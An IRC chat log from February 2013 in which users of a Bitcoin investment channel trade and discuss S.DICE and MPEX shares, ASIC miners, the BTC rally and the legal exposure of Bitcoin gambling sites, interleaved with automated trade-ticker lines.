[-] Feb 08 03:07:18 [MPEX] [S.MPOE] 20131 @ 0.00067903 = 13.6696 BTC [-] Feb 08 03:08:24 Better cash in Feb 08 03:09:07 at some point, these coins start really being worth a lot of money. Feb 08 03:10:29 But what happened since last month that would create such huge demand? Feb 08 03:11:18 could be a whale charging up their stash to play more dice Feb 08 03:11:49 hello btcland Feb 08 03:12:21 honestly this rally is scaring my Feb 08 03:12:22 i was off for 24h, how many drama ? Feb 08 03:12:22 me Feb 08 03:12:28 btc rally Feb 08 03:12:45 the bears getting slaughtered, ect Feb 08 03:12:47 i say drama :) Feb 08 03:12:55 bears getting slaughtered Feb 08 03:13:09 and me crying not buying btc when they were 17 Feb 08 03:13:57 no worries, just wait for the next Mtgox hack Feb 08 03:17:20 reward halving Feb 08 03:17:24 is really kicking in Feb 08 03:17:31 and the press Feb 08 03:18:24 we are heading for the moon Feb 08 03:18:33 bug Feb 08 03:18:39 http://bitcoincharts.com/charts/mtgoxUSD#rg30ztgSzm1g10zm2g25zv Feb 08 03:18:40 you ssaid earlier, dice could be in trouble Feb 08 03:18:41 what is Feb 08 03:18:42 ? Feb 08 03:18:47 not legal Feb 08 03:19:06 I have no insider knowledge Feb 08 03:19:17 oh, so its not about the volume? Feb 08 03:19:44 its muddy, really. it doesnt pay taxes, it deals with bitcoin Feb 08 03:19:57 what is your analysis Feb 08 03:20:13 of the near term prospects for S.DICE? Feb 08 03:20:49 What country is S.DICE in? None? Feb 08 03:21:12 we will stay at below 7ish, for a while now, the extra 3 million shares satisfied the market and some people are hoping to cash out quick Feb 08 03:21:48 the volume that we saw last month was largely due to just a handful of whales. i want volume from everyone Feb 08 03:21:58 1 whale Feb 08 03:22:03 seems the whales have stopped for now.. similar to what happened early in jan Feb 08 03:22:11 so its just that 1 guy that pumped the price Feb 08 03:22:15 there is something different this time Feb 08 03:22:19 I beleive Feb 08 03:22:19 which is? Feb 08 03:22:39 that's an exercise for the reader ;-) Feb 08 03:22:52 so near term prospects, sellers are a bit screwed Feb 08 03:22:58 this btc rally isn't helping Feb 08 03:23:18 I'm less inclined to play dice due to this rally, opposite to what eric said. but thats just me Feb 08 03:24:07 im sure theres a few bored millionaires out there, we need to reach them. Feb 08 03:24:19 also, advertise on rkoi. :) Feb 08 03:24:51 Get Dan Tan betting on it Feb 08 03:24:55 then we are set Feb 08 03:28:31 http://hahanice.com/the-top-10-biggest-casino-losers/ Feb 08 03:28:35 we need people like those Feb 08 03:34:29 anyone here actually report their bitcoin earnings to govt Feb 08 03:37:29 http://i.imgur.com/OlBhoE6.jpg Feb 08 03:50:40 What country is S.DICE in? None? Irland Feb 08 03:51:28 [MPEX] [S.MPOE] 4321 @ 0.00067981 = 2.9375 BTC [+] Feb 08 03:51:30 [MPEX] [S.MPOE] 3746 @ 0.00067984 = 2.5467 BTC [+] Feb 08 03:51:40 for the main page, but i dunno for the script. sensitive info imo Feb 08 03:54:53 https://www.ltcasics.com/index.php?route=product/category&path=62 Feb 08 03:55:34 Eh Feb 08 04:03:32 [MPEX] [S.DICE] 2500 @ 0.00619998 = 15.5 BTC [-] Feb 08 04:07:04 http://i.imgur.com/OlBhoE6.jpg << you mean usd Feb 08 04:08:02 [BTCTC] [COGNITIVE] 1 @ 0.339 BTC [+] Feb 08 04:10:48 [MPEX] [S.MPOE] 4321 @ 0.00067979 = 2.9374 BTC [-] Feb 08 04:10:50 [MPEX] [S.MPOE] 9054 @ 0.00067984 = 6.1553 BTC [+] Feb 08 04:10:51 [MPEX] [S.MPOE] 10850 @ 0.00068336 = 7.4145 BTC [+] Feb 08 04:10:53 [MPEX] [S.MPOE] 10950 @ 0.00068832 = 7.5371 BTC [+] Feb 08 04:10:54 [MPEX] [S.MPOE] 2007 @ 0.00068908 = 1.383 BTC [+] Feb 08 04:26:48 [MPEX] [S.MPOE] 14801 @ 0.00068908 = 10.1991 BTC [+] Feb 08 04:39:04 Mp, if you are here. Mind pushing my deposit Feb 08 04:42:30 [MPEX] [S.MPOE] 4321 @ 0.00067957 = 2.9364 BTC [-] Feb 08 04:42:31 [MPEX] [S.MPOE] 13035 @ 0.00067943 = 8.8564 BTC [-] Feb 08 04:43:50 lessee Feb 08 04:44:44 all done. Feb 08 04:44:53 Thank you Feb 08 04:44:55 [MPEX] [S.MPOE] 15100 @ 0.00067943 = 10.2594 BTC [-] Feb 08 04:54:09 huh Feb 08 04:54:20 I thought we were topping out Feb 08 04:54:28 maybe not Feb 08 04:56:03 ;;ticker Feb 08 04:56:05 BTCUSD ticker | Best bid: 22.33430, Best ask: 22.42005, Bid-ask spread: 0.08575, Last trade: 22.30101, 24 hour volume: 60559.49891265, 24 hour low: 20.87000, 24 hour high: 22.49989, 24 hour vwap: 21.76940 Feb 08 04:57:45 22.50 about to fall Feb 08 04:59:04 [BTCTC] [GSDPT] 4 @ 0.0062 = 0.0248 BTC [+] Feb 08 04:59:59 well we are going to the moob Feb 08 05:00:01 moon Feb 08 05:00:02 so Feb 08 05:02:20 moob Feb 08 05:02:28 is boom backwards Feb 08 05:02:31 ! Feb 08 05:03:26 ;;ticker Feb 08 05:27:08 beuh **** ENDING LOGGING AT Fri Feb 8 05:37:59 2013 **** BEGIN LOGGING AT Fri Feb 8 05:38:04 2013 **** ENDING LOGGING AT Fri Feb 8 05:38:42 2013 **** BEGIN LOGGING AT Fri Feb 8 05:39:22 2013 Feb 08 05:41:20 litecoin parity.. mhmmm Feb 08 05:44:29 http://trilema.com/2013/they-really-are-buttcoins-nao/ Feb 08 05:44:34 somebody put this on reddit. Feb 08 05:46:18 did pr deliver? Feb 08 05:46:35 the op did Feb 08 06:02:28 220 dollars worth for a lifetime of shame Feb 08 06:02:39 well it could be a fortune.. Feb 08 06:07:40 seems a fair trade. **** BEGIN LOGGING AT Fri Feb 8 14:06:23 2013 Feb 08 14:13:38 [MPEX] [S.MPOE] 4321 @ 0.00068613 = 2.9648 BTC [-] Feb 08 14:13:40 [MPEX] [S.MPOE] 5179 @ 0.00068584 = 3.552 BTC [-] Feb 08 14:58:57 hi Feb 08 15:01:04 hi Feb 08 15:01:50 :) Feb 08 15:02:08 Nefario been around? Feb 08 15:02:17 hello, nope Feb 08 15:02:32 :) Feb 08 15:02:58 ;;ticker Feb 08 15:02:59 BTCUSD ticker | Best bid: 22.46198, Best ask: 22.50000, Bid-ask spread: 0.03802, Last trade: 22.46198, 24 hour volume: 69929.36719655, 24 hour low: 21.25000, 24 hour high: 22.70000, 24 hour vwap: 22.07695 Feb 08 15:03:03 not bad eh Feb 08 15:05:27 anyone here a member of the bitcoin foundation? Feb 08 15:07:19 Chaang-Noi: Just member? Ya, I am. Feb 08 15:10:36 What are the benefits of becoming a foundation member? Feb 08 15:12:08 not much. you don' even get a badge. Feb 08 15:12:35 oh :( Feb 08 15:13:08 i just purchased some shares in some btc companies :) Feb 08 15:14:52 i would like to know about the forum on the foundation, is it helpful or dead? thanks Feb 08 15:15:45 hi Eskimobob yeah been away but been working:) Feb 08 15:16:59 zup giga, hows it going? Feb 08 15:18:05 I'm not too active on it but it has topics that have a fair amount of discussion and others that get either replies like "don't know" , etc. Feb 08 15:18:52 Chaang-Noi: But there are some conversations there that don't occur elsewhere so I make sure to check in on it ... something I'm past due on doing. Feb 08 15:19:27 hmm Feb 08 15:19:43 i have sent over 100 btc on the other forum but not sure if i should pay the 2.5 for the other forum... Feb 08 15:19:44 (especially since I accepted the invite to be a mod) Feb 08 15:19:46 i think i might... Feb 08 15:19:54 lol Feb 08 15:20:31 well if i join ill send you a message and see how long it takes you to respond :) Feb 08 15:24:51 it's a Goat Feb 08 15:25:35 [MPEX] [S.MPOE] 6400 @ 0.00068584 = 4.3894 BTC [-] Feb 08 15:38:36 heh namworld left Feb 08 15:38:49 sure is giga, hows it been? Feb 08 15:39:01 wait, holy shit, its goat Feb 08 15:39:04 you came back from exile Feb 08 15:39:14 you going to get massive bfl soon? Feb 08 15:39:27 lol D3, i was never exiled here Feb 08 15:39:31 iv just been busy:) Feb 08 15:39:35 heh Feb 08 15:41:17 BFL receives the chips into the bumping facility on monday Feb 08 15:41:47 brb, need to raid a shop in KC :) Feb 08 15:41:48 they are only 4 months late, what's another couple weeks Feb 08 15:42:06 i have ehard that one before. Feb 08 15:42:15 as long as they are more or less first it does not really matter Feb 08 15:42:31 well it does matter, but huge damage wont be done. Feb 08 15:42:34 they're already at most second Chaang-Noi Feb 08 15:42:41 mircea_popescu, we already know your opinions, no need to repeat yourself Feb 08 15:42:59 gigavps who's the "we" backing you ? Feb 08 15:43:06 yeah, but i dont really count 2 60 ghs asics as much of anything, it wont make a dent in profitability Feb 08 15:43:17 i guess it depends how quick the chinese move. Feb 08 15:43:25 they did get good reviews on the chinese boards, so Feb 08 15:43:25 mircea_popescu, i have employees Feb 08 15:43:32 mircea_popescu, i have Gigaminers Feb 08 15:43:33 it may spark a little fizz in there. Feb 08 15:43:47 gigavps so far you have debts. stop inflating yourself i won't have to slap you back into shape. Feb 08 15:43:55 yeah, the chinese might make a dent, might not. we will see Feb 08 15:44:11 man, no love lost here, lol Feb 08 15:44:17 mircea_popescu, i'm sorry you can't see past your own nose Feb 08 15:44:19 what did i miss in the last month? Feb 08 15:44:26 gigavps how;s amazingrando doing these days ? Feb 08 15:44:31 i recall you were pushing him Feb 08 15:44:37 much like you were pushing piratein the day Feb 08 15:44:45 are you a scammer gigavps ? Feb 08 15:44:56 mircea_popescu, i wish you knew what you were talking about Feb 08 15:44:59 o rly ? Feb 08 15:45:14 but it ok, i'll excuse your ignorance Feb 08 15:45:33 tell you what. excuse my ignorance in silence i'll excuse your scammy existence. Feb 08 15:45:39 should be something you can follow. Feb 08 15:45:43 lol Feb 08 15:46:14 dumbass needs to learn when it's time to say sorry and stfu. Feb 08 15:46:20 hint : it's when i say stfu or you're getting it. Feb 08 15:46:29 getting what? Feb 08 15:46:54 giga do you hold any/much ltc? Feb 08 15:47:01 Chaang-Noi, no Feb 08 15:47:05 ok, thanks Feb 08 15:48:04 mircea, what do you have aginst giga? iv been away so i really dont know what is going on. Feb 08 15:49:40 i think mircea_popescu isn't feeling well today Feb 08 15:50:24 well, if he is going to make an attack he should at least back it up if asked about it... Feb 08 15:51:46 maybe he is just upset at bfl and is taking it out on you? i jumped in when bfl was brought up... Feb 08 15:53:44 the new btc high today was pretty nice to see Feb 08 15:59:10 what the hell happened to #bitcoin-watch it now has transactions not price quotes??? Feb 08 16:01:37 [HAVELOCK] [SDICE] 3 @ 0.63999999 = 1.92 BTC [+] Feb 08 16:03:02 ahh, assbat is still alive i see, but damn, not much trading... Feb 08 16:03:30 been slow this week because SDICE releases 3mil more shares Feb 08 16:03:31 hi Feb 08 16:03:43 so everyone was diving into that Feb 08 16:03:49 now they are calm Feb 08 16:04:00 released* Feb 08 16:04:03 sdice has been more popular than i expected, however i still expect tears before this is over Feb 08 16:04:18 what do you think will happen Feb 08 16:04:48 government intervention Feb 08 16:05:15 promoters of gambling with btc will probably go to jail Feb 08 16:05:20 the US doesn't care where you are Feb 08 16:05:53 any business strategy that does not include government compliance will end in failure Feb 08 16:05:56 i dont buy that Feb 08 16:06:20 maybe mircea_popescu should add that to his list of btc business starting tips Feb 08 16:06:30 that works on the premise that bitcoin is first classified as illegal Feb 08 16:06:39 and also, Feb 08 16:06:40 i don't believe so Feb 08 16:06:57 any movement of value will eventually be classified and regulated Feb 08 16:06:57 assumes the gov cares more about gambling bitcoin, than those who exchange it for fiat Feb 08 16:06:58 the govt has gone hard core after people gambling in the usa Feb 08 16:07:16 sdice is an irish co Feb 08 16:07:17 they ahve even redirected planes into the usa to arrest people Feb 08 16:07:22 dealing strictly in btc Feb 08 16:07:34 the person on that flight was not american, was not going to the usa, and did not ahve a company in the usa Feb 08 16:07:35 the US gov has gone after internet gambling businesses the world over Feb 08 16:07:42 he is in a usa jail for atleast 10 years Feb 08 16:07:45 yeah a guy just went to jail the other week for writing gambling software for a country where it is legal Feb 08 16:07:57 pigeons, link? Feb 08 16:08:01 one sec Feb 08 16:08:27 http://www.wired.com/threatlevel/2013/01/coder-charged-for-gambling-software/ Feb 08 16:08:32 CampBX or Dwolla are nice targets for the US giv Feb 08 16:08:35 gov* Feb 08 16:08:39 also look forward to the link :/ it is sad really, what if the govt goes this hard core aginst btc as it does gambling in other countires... Feb 08 16:09:26 oh yeah, and dont forget their little Silk Road problem Feb 08 16:09:40 pigeons, thanks for the link Feb 08 16:09:56 yeah it was kind of big news cause it kind of steps over a new line Feb 08 16:09:59 silk road will be ahrd to catch, however the bitcoin foundation wont :/ Feb 08 16:10:04 as you can see from that article, you don't even need to be the one who uses the software for gambling! Feb 08 16:10:21 fireduck could be put in jail just for writing sdice Feb 08 16:10:37 i wonder if anyone who holds a btc that was onces used for gambling will have to go to jail :/ Feb 08 16:10:50 erik could be put in jail just for promoting sdice Feb 08 16:11:08 and people wonder why i have a claims process Feb 08 16:11:17 give me your bitcoins and they've give you amnesty Feb 08 16:11:18 you know they will notice a site that made over a million in its first year :/ Feb 08 16:11:33 it's all possible, i just think they will prioritize attacking other aspects of bitcoin Feb 08 16:11:37 i only have 8 left pigeons :) Feb 08 16:11:51 sdice has made $0 Feb 08 16:12:36 ThickAsThieves, it doesn't matter, i bet we'll soon see interpretations of the law such that it won't matter what you are gambling Feb 08 16:13:04 could be bitcoins, dollars, amazon coins, whatever Feb 08 16:13:12 yeah i dont know... it will be intersting, i hope the us govt ignores it, buit i bet they wont forever Feb 08 16:13:46 i'm sure they arent ignoring it, the question is how will they appraoch it all Feb 08 16:14:00 what they should do, Feb 08 16:14:07 is make a comepting digital currency Feb 08 16:14:09 considering their tendency to ignore real problems and go after non-issues makes me think it will happen Feb 08 16:14:09 yeah, what can they do Feb 08 16:14:15 when, who knows Feb 08 16:14:22 and then each country uses their own cryptocurrency or such Feb 08 16:14:25 i would have said they could not do much about gambling in other countires as well but.... Feb 08 16:14:39 then they can keep control be sheer popularity over btc Feb 08 16:14:50 be=by* Feb 08 16:14:52 Hello Feb 08 16:15:00 where can i buy some ASICMINER shares? Feb 08 16:15:15 [MPEX] [S.MPOE] 8591 @ 0.00068861 = 5.9158 BTC [+] Feb 08 16:15:29 if they had their own coin (us gov) they could strictly manage taxes, etc Feb 08 16:15:59 that would put laws regarding crypto currencies on the book, and then they could illegalize btc Feb 08 16:16:00 they can do it with this one Feb 08 16:16:07 (thinking out loud sry) Feb 08 16:16:38 its a public ledger, they can manage taxes etc as you say Feb 08 16:16:48 ThickAsThieves, i don't think btc would be made illegal Feb 08 16:17:21 anyone want to buy my claim for 4,100 asic miner shares? :) Feb 08 16:17:31 this guy encrypted his home folder with 100BTC in wallet, now about his password: [09:16] jrib: Uhm, I figured Id probably never need it Feb 08 16:17:31 tw0b3low Feb 08 16:17:48 $2000 mistake, lolcat Feb 08 16:17:49 not good Feb 08 16:18:02 i was trying to help him last night, but there is no help to be had. Feb 08 16:18:18 he literally has NO CLUE what it was, thought he was entering noise or something. Feb 08 16:18:25 kinda sad Feb 08 16:18:31 but he will NEVER make that mistake again, i hope Feb 08 16:20:08 yeah... btc is not ready for the masses :( Feb 08 16:20:56 https://www.litecoinglobal.com/security/PUNT Feb 08 16:22:18 where do i sign? Feb 08 16:22:23 what am i looking at pigeons? Feb 08 16:22:35 look at the contract Feb 08 16:23:36 oh lol Feb 08 16:25:04 I'll pay dividends whenever I feel like it. Feb 08 16:25:05 I won't be issuing any financial statements at all. Feb 08 16:26:11 at first i thought it was some kind of mutual fund Feb 08 16:26:20 he literally has NO CLUE what it was, thought he was entering noise or something. << I'm calling BS. When you put in passwords today, you have to confirm it. Feb 08 16:26:28 Random noise won't require you to type it exactly the same twice. Feb 08 16:26:52 go to #ubuntu, talk to lolcat Feb 08 16:27:05 [09:17] a $2000 mistake :/ Feb 08 16:27:12 oh right, people on irc don't lie. Feb 08 16:27:14 I forgot. Feb 08 16:27:38 i'm just the messenger Feb 08 16:27:55 imsaguy: the other half of S2CM lol Feb 08 16:28:00 haven't seen you in awhile Feb 08 16:30:09 "I reserve the right to spend raised funds on anything that I feel like be that Feb 08 16:30:12 gambling on LTC Arcade or playing games, Litecoin gaming and simply a flutter down Feb 08 16:30:15 the racetrack." Feb 08 16:31:18 yeah, im not sure why that is even listed Feb 08 16:49:20 [MPEX] [S.DICE] 25072 @ 0.00614999 = 154.1925 BTC [+] Feb 08 16:49:22 [MPEX] [S.DICE] 9928 @ 0.00615 = 61.0572 BTC [+] Feb 08 16:50:38 [HAVELOCK] [SDICE] 350 @ 0.635 = 222.25 BTC [-] Feb 08 16:52:06 asicminer shares? Feb 08 16:52:11 mr assbot Feb 08 16:53:30 nobody talks Feb 08 16:56:25 [MPEX] [S.DICE] 72 @ 0.00615 = 0.4428 BTC [+] Feb 08 16:56:27 [MPEX] [S.DICE] 6928 @ 0.00619997 = 42.9534 BTC [+] Feb 08 16:57:37 [HAVELOCK] [SDICE] 70 @ 0.635 = 44.45 BTC [-] Feb 08 17:08:50 penny bot is pointing down again. Feb 08 17:11:40 yeah, what is this penny bot i have heard of? Feb 08 17:11:53 Holy Moses - a Goat sighting Feb 08 17:11:58 =) Feb 08 17:12:59 bot that sells .01 BTC regularly, either above or below the current price, to put upward or downward pressure on the market price Feb 08 17:13:02 i think Feb 08 17:13:05 please correct me Feb 08 17:13:30 anyone use goxsh or toyTrader? Feb 08 17:13:35 suo Feb 08 17:13:35 sup Feb 08 17:13:38 0.4 for asicminer Feb 08 17:13:42 what is this Feb 08 17:14:29 this is dog Feb 08 17:14:34 hi dog Feb 08 17:14:44 ruff Feb 08 17:14:47 mmmm Feb 08 17:15:54 hey dog Feb 08 17:15:59 Mooo Feb 08 17:16:32 moo is cow. Feb 08 17:16:41 gives milk. Feb 08 17:16:43 grrrrrr Feb 08 17:16:48 steak Feb 08 17:17:12 [MPEX] [S.MPOE] 21500 @ 0.00069298 = 14.8991 BTC [+] Feb 08 17:17:12 [MPEX] [S.MPOE] 4321 @ 0.00069297 = 2.9943 BTC [-] Feb 08 17:17:14 [MPEX] [S.MPOE] 6887 @ 0.00069455 = 4.7834 BTC [+] Feb 08 17:17:21 is it unethical to install a mouse mover on my work machine while I'm workng from home during this snowpacalypse? Feb 08 17:17:26 because i did Feb 08 17:17:36 :P Feb 08 17:17:48 :( Feb 08 17:17:49 :) Feb 08 17:17:54 later Feb 08 17:17:56 adios Feb 08 17:18:19 DeadWeasel: lol nice Feb 08 17:18:44 i built one of those out of lego, back in the day... there was ad companies that you installed the ads on your homepage, and as long as you were using the computer you got paid Feb 08 17:18:51 i'm mean,i'm just a monkey QA tester. so I'm essentially working Feb 08 17:18:56 awesome! Feb 08 17:19:04 err not your home page, right abvoe the start menu on windows Feb 08 17:19:12 Like homer with the that pecking bird toy thing Feb 08 17:19:19 used to pull in like $50/month from it Feb 08 17:19:34 on university student budget, thats a lot of beer! Feb 08 17:20:00 almost enough! Feb 08 17:26:02 hi JWU_42 :) Feb 08 17:26:25 getting sierra charts working in wine on 64bit nix is annoying me Feb 08 17:26:33 any ideas? Feb 08 17:32:34 [MPEX] [S.MPOE] 663 @ 0.00069455 = 0.4605 BTC [+] Feb 08 17:32:36 [MPEX] [S.MPOE] 5000 @ 0.00069461 = 3.4731 BTC [+] Feb 08 17:32:38 [MPEX] [S.MPOE] 10887 @ 0.00069462 = 7.5623 BTC [+] Feb 08 17:34:13 [MPEX] [S.MPOE] 45 @ 0.00069 = 0.0311 BTC [-] Feb 08 17:34:15 [MPEX] [S.MPOE] 4450 @ 0.00068973 = 3.0693 BTC [-] Feb 08 17:34:20 [MPEX] [S.MPOE] 2648 @ 0.00068861 = 1.8234 BTC [-] Feb 08 17:35:58 [MPEX] [S.MPOE] 512 @ 0.00068861 = 0.3526 BTC [-] Feb 08 17:36:00 [MPEX] [S.MPOE] 4321 @ 0.00068585 = 2.9636 BTC [-] Feb 08 17:36:02 [MPEX] [S.MPOE] 12708 @ 0.00068584 = 8.7157 BTC [-] Feb 08 17:42:30 http://forums.somethingawful.com/showthread.php?threadid=3486823&userid=0&perpage=40&pagenumber=379 Feb 08 17:42:45 lol @sa ppl trying to not notice they got owned. Feb 08 17:42:58 DeadWeasel that's the best .5 btc i ever spent :D Feb 08 17:44:05 hmmmm Feb 08 17:44:11 has mnw been on irc? Feb 08 17:45:17 [MPEX] [S.MPOE] 4321 @ 0.00069431 = 3.0001 BTC [+] Feb 08 17:45:19 [MPEX] [S.MPOE] 4229 @ 0.00069462 = 2.9375 BTC [+] Feb 08 17:45:58 [BTCTC] [S.BBET-PT] 1 @ 0.002 BTC [+] Feb 08 17:46:02 mircea lol wtf! Feb 08 17:47:04 mircea_popescu: glad to help! Feb 08 17:47:06 ;) Feb 08 17:56:06 http://mpex.co/faq_cn.html Feb 08 17:56:18 if anyone knows chiense please give that a look let me know if anything is broken Feb 08 17:57:27 mircea_popescu: it's in chinese Feb 08 17:57:31 i think it is broken Feb 08 17:57:44 [MPEX] [S.MPOE] 4321 @ 0.00068609 = 2.9646 BTC [-] Feb 08 17:57:45 lol Feb 08 17:57:46 [MPEX] [S.MPOE] 12757 @ 0.00068584 = 8.7493 BTC [-] Feb 08 17:57:51 :) Feb 08 18:05:59 mircea_popescu: do you want me to do the FAQ in spanish? Feb 08 18:06:15 sure. Feb 08 18:06:34 mircea_popescu: I'll try to have it for monday. Feb 08 18:07:18 pretty cool Feb 08 18:07:58 what i'd really like is for someone to do it in farsi Feb 08 18:14:38 [HAVELOCK] [SDICE] 6 @ 0.63999999 = 3.84 BTC [+] Feb 08 18:15:53 [BTCTC] [S.BBET-PT] 5 @ 0.002 = 0.01 BTC [+] Feb 08 18:19:03 [MPEX] [S.DICE] 8485 @ 0.00619997 = 52.6067 BTC [+] Feb 08 18:19:05 [MPEX] [S.DICE] 1515 @ 0.00619998 = 9.393 BTC [+] Feb 08 18:19:38 [HAVELOCK] [SDICE] 72 @ 0.63999999 = 46.08 BTC [+] Feb 08 18:19:39 [HAVELOCK] [SDICE] 28 @ 0.635 = 17.78 BTC [-] Feb 08 18:20:06 farsi would be sweet. Feb 08 18:20:19 [MPEX] [S.DICE] 10000 @ 0.00619998 = 61.9998 BTC [+] Feb 08 18:20:38 [HAVELOCK] [SDICE] 32 @ 0.635 = 20.32 BTC [-] Feb 08 18:20:39 [HAVELOCK] [SDICE] 30 @ 0.626 = 18.78 BTC [-] Feb 08 18:20:41 [HAVELOCK] [SDICE] 20 @ 0.62500001 = 12.5 BTC [-] Feb 08 18:20:42 [HAVELOCK] [SDICE] 8 @ 0.625 = 5 BTC [-] Feb 08 18:20:43 [HAVELOCK] [SDICE] 10 @ 0.62 = 6.2 BTC [-] Feb 08 18:21:08 haha nice arbing going on Feb 08 18:21:36 yea :) its the easiest way to grow the size of sdice on havelock Feb 08 18:21:45 wait for bids, then fill them Feb 08 18:23:55 [MPEX] [S.MPOE] 4321 @ 0.00068762 = 2.9712 BTC [+] Feb 08 18:23:57 [MPEX] [S.MPOE] 35679 @ 0.0006877 = 24.5364 BTC [+] Feb 08 18:24:29 soundsl ike a plan Feb 08 18:24:55 and i make a few btc off the arb :) Feb 08 18:25:12 but hey, its a manual process Feb 08 18:25:18 though i suppose i could bot it up Feb 08 18:26:03 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.06835702 = 68.357 BTC [-] Feb 08 18:26:11 [MPEX] [O.BTCUSD.P210T] 750 @ 0.08441671 = 63.3125 BTC [-] Feb 08 18:26:14 havelock is growing quickly Feb 08 18:26:23 S.DICE x 851`000 Feb 08 18:26:27 what is it half a mil ? Feb 08 18:26:33 a, almost a mil by now. nice. Feb 08 18:27:06 13 mil on mpex now? Feb 08 18:27:33 something like that Feb 08 18:27:35 6.5462% Feb 08 18:27:43 the unsold 1mn is 4th or 3rd ? Feb 08 18:27:48 i think 3rd Feb 08 18:27:56 44, 55, 62 Feb 08 18:28:07 so then 12mn Feb 08 18:28:35 ah right Feb 08 18:29:33 [MPEX] [S.DICE] 1000 @ 0.00619997 = 6.2 BTC [-] Feb 08 18:29:35 [MPEX] [S.DICE] 9000 @ 0.00619998 = 55.7998 BTC [+] Feb 08 18:29:59 even if manual it's not really so bad, one command line sort of thing Feb 08 18:30:18 yea Feb 08 18:30:28 not making much off the arb now though on these ones... but its worth it just to move it over Feb 08 18:30:39 [HAVELOCK] [SDICE] 7 @ 0.62000001 = 4.34 BTC [+] Feb 08 18:30:40 [HAVELOCK] [SDICE] 93 @ 0.62 = 57.66 BTC [-] Feb 08 18:30:44 i still have 30000 bids on havelock at 0.62 Feb 08 18:30:49 (300 units) Feb 08 18:31:52 [MPEX] [S.DICE] 10000 @ 0.00619998 = 61.9998 BTC [+] Feb 08 18:32:38 [HAVELOCK] [SDICE] 100 @ 0.62 = 62 BTC [-] Feb 08 18:32:45 keeps the prices pretty much in sync too Feb 08 18:33:00 market efficiency Feb 08 18:33:34 [MPEX] [S.DICE] 10000 @ 0.00619998 = 61.9998 BTC [+] Feb 08 18:34:38 [HAVELOCK] [SDICE] 100 @ 0.62 = 62 BTC [-] Feb 08 18:36:25 !ticker h sdice Feb 08 18:36:28 [HAVELOCK:SDICE] 1D: 0.61000000 / 0.63021172 / 0.63999999 (1058 shares, 666.76399880 BTC), 7D: 0.52100000 / 0.64791661 / 0.88000000 (6816 shares, 4416.19958045 BTC), 30D: 0.44000000 / 0.63097449 / 0.89000000 (10432 shares, 6582.32583140 BTC) Feb 08 18:38:12 [MPEX] [S.MPOE] 5794 @ 0.0006877 = 3.9845 BTC [+] Feb 08 18:42:21 anybody used AidoATP program? Feb 08 18:42:32 https://bitcointalk.org/index.php?topic=109831.0 Feb 08 18:45:06 java seems dubious. Feb 08 18:48:40 [MPEX] [S.MPOE] 4321 @ 0.00068597 = 2.9641 BTC [-] Feb 08 18:48:41 [MPEX] [S.MPOE] 16132 @ 0.00068584 = 11.064 BTC [-] Feb 08 18:50:50 java is lame Feb 08 18:51:39 mircea_popescu: process my deposit please? Feb 08 18:52:19 done. Feb 08 18:52:22 merci! Feb 08 18:53:03 [MPEX] [S.DICE] 5000 @ 0.00619998 = 30.9999 BTC [+] Feb 08 18:53:37 [HAVELOCK] [SDICE] 23 @ 0.63 = 14.49 BTC [+] Feb 08 18:53:39 [HAVELOCK] [SDICE] 16 @ 0.621 = 9.936 BTC [-] Feb 08 19:14:06 mmm Feb 08 19:14:17 mpex being worth more than mtgox??? Feb 08 19:14:20 what bs is that Feb 08 19:14:34 i think glbse was worth more than mpex ! Feb 08 19:14:52 right, mircea_popescu? Feb 08 19:15:13 [MPEX] [S.DICE] 6300 @ 0.00619998 = 39.0599 BTC [+] Feb 08 19:16:21 [MPEX] [S.MPOE] 3124 @ 0.00068584 = 2.1426 BTC [-] Feb 08 19:16:23 [MPEX] [S.MPOE] 8800 @ 0.00068575 = 6.0346 BTC [-] Feb 08 19:16:23 i were reading some oldish topic on btctalk Feb 08 19:16:24 [MPEX] [S.MPOE] 1112 @ 0.00067997 = 0.7561 BTC [-] Feb 08 19:16:29 [MPEX] [S.MPOE] 10000 @ 0.00067966 = 6.7966 BTC [-] Feb 08 19:16:32 [MPEX] [S.MPOE] 1414 @ 0.00067965 = 0.961 BTC [-] Feb 08 19:16:52 is mpex good? Feb 08 19:17:03 ui is horribad Feb 08 19:17:06 i'm trying bitfunder atm Feb 08 19:17:19 mpex seems to be ok still Feb 08 19:17:40 when colored coin system comes out it'll all be fixed Feb 08 19:18:04 can i ask you guys something? would you guys invest in rastapool mining? Feb 08 19:18:09 n o Feb 08 19:18:12 never heard Feb 08 19:18:14 what is it Feb 08 19:18:23 JAH Feb 08 19:18:26 I looked at it Feb 08 19:18:27 but no i wouldnt even if i had heard of it Feb 08 19:18:38 but investing in mining is tricky with ASICS coming Feb 08 19:18:38 What you think Thick? Feb 08 19:18:46 ya Feb 08 19:18:51 the returns are nice Feb 08 19:18:57 but when asics hit Feb 08 19:18:59 i'm guessing he didn't get any avalons Feb 08 19:19:13 but he does have shares in the "ASICMINER" Feb 08 19:19:14 shares will plummet if they dont get ASICS in the first week they hit hard Feb 08 19:19:34 hmmm Feb 08 19:19:51 which means you'd be stuick in the stock til rasta invested enough to be on track and got his deliveries Feb 08 19:20:02 stuick=stock Feb 08 19:20:06 stuck* Feb 08 19:20:08 bleh Feb 08 19:20:41 i wish i could buy some ASICMINING shares myself Feb 08 19:20:45 [MPEX] [S.MPOE] 1127 @ 0.0006877 = 0.775 BTC [+] Feb 08 19:20:47 [MPEX] [S.MPOE] 4321 @ 0.00069461 = 3.0014 BTC [+] Feb 08 19:20:48 [MPEX] [S.MPOE] 9459 @ 0.00069462 = 6.5704 BTC [+] Feb 08 19:20:50 [MPEX] [S.MPOE] 13271 @ 0.00069523 = 9.2264 BTC [+] Feb 08 19:20:54 they have some for bid in a forum thread somewhere i think Feb 08 19:21:05 hmm yeah Feb 08 19:21:11 just waiting a bit Feb 08 19:21:39 Are you in MPOE? Feb 08 19:21:50 mpoe? Feb 08 19:22:11 http://mpex.co/?mpsic=S.MPOE Feb 08 19:22:39 [HAVELOCK] [SDICE] 5 @ 0.62 = 3.1 BTC [-] Feb 08 19:26:07 true, yeah thinking to use mpex or not Feb 08 19:26:10 are they legal? Feb 08 19:28:19 Is bitcoin investing legal? Feb 08 19:28:25 no idea Feb 08 19:28:47 this is all risky stuff Feb 08 19:30:17 haha yeah true Feb 08 19:30:28 hope they dont get closed down Feb 08 19:34:58 i'm checking it out with lawyer in Australia Feb 08 19:35:12 [BTCTC] [RSM] 51 @ 0.0098 = 0.4998 BTC [-] Feb 08 19:35:12 just registered the domain bitcoin-legal.org Feb 08 19:35:54 i think glbse was worth more than mpex ! << no. Feb 08 19:36:05 glbse was worth something between nothing and 3% of mpex. Feb 08 19:38:13 also made another legal thread interpreting 